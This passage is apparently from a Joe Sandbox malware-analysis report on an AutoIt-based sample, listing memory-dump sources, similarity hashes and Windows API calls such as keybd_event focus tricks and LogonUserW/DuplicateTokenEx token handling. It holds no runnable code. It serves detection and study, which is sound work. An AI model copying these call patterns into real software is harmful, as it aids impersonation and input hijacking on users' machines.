                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 614378929-0
                                                                                                                                        • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                                                                        • Instruction ID: 2767db862e18e2ed4d769b9e77961d1fa04da4d7b6471add51d4d3fabb1f29f7
                                                                                                                                        • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                                                                        • Instruction Fuzzy Hash: FF014E722047045BE3318F55D881B5AFBECFB85371F29059DE984932C0E7706809C774
                                                                                                                                        APIs
                                                                                                                                        • GetForegroundWindow.USER32(00000000,?,?,?,00BB14B5,?), ref: 00BB2A01
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ForegroundWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2020703349-0
                                                                                                                                        • Opcode ID: a95fb5b72ba2e53994a7e8cab2a048c74aced3de46affa5dde4a11b7aa39a18e
                                                                                                                                        • Instruction ID: 7a1a722ccc5ce1825f34425cb369fa80e976d511c8c6d0165126be4887eea2d1
                                                                                                                                        • Opcode Fuzzy Hash: a95fb5b72ba2e53994a7e8cab2a048c74aced3de46affa5dde4a11b7aa39a18e
                                                                                                                                        • Instruction Fuzzy Hash: 80017536740A419FD325CB2DC454BB677D2EB85314F6985A9D08B8B251DBB2FC42C790
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                                                                        • Instruction ID: de3aebe97b30adee244ae8000785ec5cfd1f6cf1bc769b9d9e395173c466a43e
                                                                                                                                        • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                                                                        • Instruction Fuzzy Hash: 8CF0F432511A1096C7313A799C05B5A33DCAF53336F110BE5F835A32D2CB74DA09A6A6
                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,00B21129,00000000,?,00B52E29,00000001,00000364,?,?,?,00B4F2DE,00B53863,00BF1444,?,00B3FDF5,?), ref: 00B54CBE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                        • Opcode ID: 300d3dd93443db4ba0f41581ab4746f9e973d5c80499c568d0c65056f7ba5847
                                                                                                                                        • Instruction ID: 6643dfcd7d1ea61fc53b08cf44583a1274a525eb1ff486b09b16beb0b553fb58
                                                                                                                                        • Opcode Fuzzy Hash: 300d3dd93443db4ba0f41581ab4746f9e973d5c80499c568d0c65056f7ba5847
                                                                                                                                        • Instruction Fuzzy Hash: D2F0E931602224A7DB215F669C05B5B37C8FFC17AAB1441D1BD19B7280CFB0D88C96E0
                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,00BF1444,?,00B3FDF5,?,?,00B2A976,00000010,00BF1440,00B213FC,?,00B213C6,?,00B21129), ref: 00B53852
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                        • Opcode ID: 9b79223a0c52d21de0ca42edb304ac93ccbf622728e56e53cd8c53901985390a
                                                                                                                                        • Instruction ID: 9ba192cfafa12085a81b5fa6c30449015acfaa3144e5162075aa128d44100b3a
                                                                                                                                        • Opcode Fuzzy Hash: 9b79223a0c52d21de0ca42edb304ac93ccbf622728e56e53cd8c53901985390a
                                                                                                                                        • Instruction Fuzzy Hash: 74E0E531100224A7D639266A9C00B9A36C8EB42FF2F1501E1BC14A3680DF51DE0993E0
                                                                                                                                        APIs
                                                                                                                                        • FreeLibrary.KERNEL32(?,?,00BF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00B24F6D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3664257935-0
                                                                                                                                        • Opcode ID: e29f08dc85b9e2dd308faff30bf43bafd2eb1b2488767aa120f399a5e6a5bc24
                                                                                                                                        • Instruction ID: 906432ff66d1c468cdcb1c2e17e6c81d09d770d87e39a6cec17c6f2ba610c9ec
                                                                                                                                        • Opcode Fuzzy Hash: e29f08dc85b9e2dd308faff30bf43bafd2eb1b2488767aa120f399a5e6a5bc24
                                                                                                                                        • Instruction Fuzzy Hash: 51F03071105761CFDB349F64E590812BBE4FF5431931089BEE1EE93911C7719844DF10
                                                                                                                                        APIs
                                                                                                                                        • IsWindow.USER32(00000000), ref: 00BB2A66
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2353593579-0
                                                                                                                                        • Opcode ID: 327b3c5f6230baa018e4dbe1814501129cf313ce068561e8ea5ee3827b0925d2
                                                                                                                                        • Instruction ID: 74442a928cebc2e0fba7fe52a1ae9fe4ba6069912b5c48ee33c57811f6dc30b6
                                                                                                                                        • Opcode Fuzzy Hash: 327b3c5f6230baa018e4dbe1814501129cf313ce068561e8ea5ee3827b0925d2
                                                                                                                                        • Instruction Fuzzy Hash: 2BE04F36350116ABC714FB30DC818FA7BDCEB5039571045B6EC27D2110DF709995D6A0
                                                                                                                                        APIs
                                                                                                                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B22DC4
                                                                                                                                          • Part of subcall function 00B26B57: _wcslen.LIBCMT ref: 00B26B6A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LongNamePath_wcslen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 541455249-0
                                                                                                                                        • Opcode ID: 761b979ece59fbb2e6490ace875b23611d349c61f760c8a4aa857c8aa070434f
                                                                                                                                        • Instruction ID: a3f0f4cd9b5be824724eed5e7a01af8ce48046e331fd205e1a5ee31e22728344
                                                                                                                                        • Opcode Fuzzy Hash: 761b979ece59fbb2e6490ace875b23611d349c61f760c8a4aa857c8aa070434f
                                                                                                                                        • Instruction Fuzzy Hash: E7E0CD726001245BC720D6589C06FDA77DDDFC8790F0401B1FD09D7248D9A4AD808550
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B23837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B23908
                                                                                                                                          • Part of subcall function 00B2D730: GetInputState.USER32 ref: 00B2D807
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00B22B6B
                                                                                                                                          • Part of subcall function 00B230F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00B2314E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3667716007-0
                                                                                                                                        • Opcode ID: e3e0f51e1fd3476e2611112276bda2ce6e6429892db53a9e5ca76e16c4895ec7
                                                                                                                                        • Instruction ID: 90f9b06cb4536c205d69b0f534b66b1011568b45e3190759cfc0cf1f86cdc08a
                                                                                                                                        • Opcode Fuzzy Hash: e3e0f51e1fd3476e2611112276bda2ce6e6429892db53a9e5ca76e16c4895ec7
                                                                                                                                        • Instruction Fuzzy Hash: 6FE07D2230022803C704BB38B81657DB7C9DBD5751F400DFEF14E87263CF2949498362
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNELBASE(00000000,00000000,?,00B60704,?,?,00000000,?,00B60704,00000000,0000000C), ref: 00B603B7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                        • Opcode ID: 5ca447a373052027bb751448d4d98a7283802e498c8cb45e41ca48f4ab42d715
                                                                                                                                        • Instruction ID: e34ae539c2aaf824077b25a35d22ec257735cebc8e303d484a46db3da2d84537
                                                                                                                                        • Opcode Fuzzy Hash: 5ca447a373052027bb751448d4d98a7283802e498c8cb45e41ca48f4ab42d715
                                                                                                                                        • Instruction Fuzzy Hash: D4D06C3204010DBBDF028F84DD06EDA3FAAFB48714F014100BE1866020C772E821AB90
                                                                                                                                        APIs
                                                                                                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00B21CBC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoParametersSystem
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3098949447-0
                                                                                                                                        • Opcode ID: 6f387bf872bb583625beadbb09cb31639811b9cedb8471e2c715a12f25f9e9c9
                                                                                                                                        • Instruction ID: d73284386ea1504017d8e3bb40d4158d3e21d55c938d122e0b3cb4d586d1b4b2
                                                                                                                                        • Opcode Fuzzy Hash: 6f387bf872bb583625beadbb09cb31639811b9cedb8471e2c715a12f25f9e9c9
                                                                                                                                        • Instruction Fuzzy Hash: 32C09B36280305EFF2148784BC4BF207754A358B00F044401F609575E3CBE11410D654
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00B39BB2
                                                                                                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00BB961A
                                                                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00BB965B
                                                                                                                                        • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00BB969F
                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00BB96C9
                                                                                                                                        • SendMessageW.USER32 ref: 00BB96F2
                                                                                                                                        • GetKeyState.USER32(00000011), ref: 00BB978B
                                                                                                                                        • GetKeyState.USER32(00000009), ref: 00BB9798
                                                                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00BB97AE
                                                                                                                                        • GetKeyState.USER32(00000010), ref: 00BB97B8
                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00BB97E9
                                                                                                                                        • SendMessageW.USER32 ref: 00BB9810
                                                                                                                                        • SendMessageW.USER32(?,00001030,?,00BB7E95), ref: 00BB9918
                                                                                                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00BB992E
                                                                                                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00BB9941
                                                                                                                                        • SetCapture.USER32(?), ref: 00BB994A
                                                                                                                                        • ClientToScreen.USER32(?,?), ref: 00BB99AF
                                                                                                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00BB99BC
                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00BB99D6
                                                                                                                                        • ReleaseCapture.USER32 ref: 00BB99E1
                                                                                                                                        • GetCursorPos.USER32(?), ref: 00BB9A19
                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00BB9A26
                                                                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00BB9A80
                                                                                                                                        • SendMessageW.USER32 ref: 00BB9AAE
                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00BB9AEB
                                                                                                                                        • SendMessageW.USER32 ref: 00BB9B1A
                                                                                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00BB9B3B
                                                                                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00BB9B4A
                                                                                                                                        • GetCursorPos.USER32(?), ref: 00BB9B68
                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00BB9B75
                                                                                                                                        • GetParent.USER32(?), ref: 00BB9B93
                                                                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00BB9BFA
                                                                                                                                        • SendMessageW.USER32 ref: 00BB9C2B
                                                                                                                                        • ClientToScreen.USER32(?,?), ref: 00BB9C84
                                                                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00BB9CB4
                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00BB9CDE
                                                                                                                                        • SendMessageW.USER32 ref: 00BB9D01
                                                                                                                                        • ClientToScreen.USER32(?,?), ref: 00BB9D4E
                                                                                                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00BB9D82
                                                                                                                                          • Part of subcall function 00B39944: GetWindowLongW.USER32(?,000000EB), ref: 00B39952
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00BB9E05
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                                                                        • String ID: @GUI_DRAGID$F
                                                                                                                                        • API String ID: 3429851547-4164748364
                                                                                                                                        • Opcode ID: 0c25a0e7292529e8ee843cf6f17e7ed6804bcf67729bbf7bce8189c28488025c
                                                                                                                                        • Instruction ID: af005785e93a0b586f2cc92caa882ea55b73abd5c2fd4da3103cd9daa2cb1585
                                                                                                                                        • Opcode Fuzzy Hash: 0c25a0e7292529e8ee843cf6f17e7ed6804bcf67729bbf7bce8189c28488025c
                                                                                                                                        • Instruction Fuzzy Hash: C4428F34204251AFD724CF28CC84EFABBE5FF49310F144A99F69A872A1DBB1E855CB51
                                                                                                                                        APIs
                                                                                                                                        • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00B3F998
                                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B7F474
                                                                                                                                        • IsIconic.USER32(00000000), ref: 00B7F47D
                                                                                                                                        • ShowWindow.USER32(00000000,00000009), ref: 00B7F48A
                                                                                                                                        • SetForegroundWindow.USER32(00000000), ref: 00B7F494
                                                                                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B7F4AA
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00B7F4B1
                                                                                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B7F4BD
                                                                                                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 00B7F4CE
                                                                                                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 00B7F4D6
                                                                                                                                        • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00B7F4DE
                                                                                                                                        • SetForegroundWindow.USER32(00000000), ref: 00B7F4E1
                                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B7F4F6
                                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00B7F501
                                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B7F50B
                                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00B7F510
                                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B7F519
                                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00B7F51E
                                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B7F528
                                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00B7F52D
                                                                                                                                        • SetForegroundWindow.USER32(00000000), ref: 00B7F530
                                                                                                                                        • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00B7F557
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                                        • API String ID: 4125248594-2988720461
                                                                                                                                        • Opcode ID: 21a43c027c5f42653cb42dcdb5878e59422df109e117be33e0060009c8208f8a
                                                                                                                                        • Instruction ID: 0c1602a693806aa48a6e2309a5329e41b6c141efde36a33569e7f7247334dd67
                                                                                                                                        • Opcode Fuzzy Hash: 21a43c027c5f42653cb42dcdb5878e59422df109e117be33e0060009c8208f8a
                                                                                                                                        • Instruction Fuzzy Hash: 71319471A40219BBEB20ABB58C4AFBF7EACEB44B50F104165FA05E71D1CBF05D00AA64
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B816C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B8170D
                                                                                                                                          • Part of subcall function 00B816C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B8173A
                                                                                                                                          • Part of subcall function 00B816C3: GetLastError.KERNEL32 ref: 00B8174A
                                                                                                                                        • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00B81286
                                                                                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00B812A8
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00B812B9
                                                                                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00B812D1
                                                                                                                                        • GetProcessWindowStation.USER32 ref: 00B812EA
                                                                                                                                        • SetProcessWindowStation.USER32(00000000), ref: 00B812F4
                                                                                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00B81310
                                                                                                                                          • Part of subcall function 00B810BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B811FC), ref: 00B810D4
                                                                                                                                          • Part of subcall function 00B810BF: CloseHandle.KERNEL32(?,?,00B811FC), ref: 00B810E9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
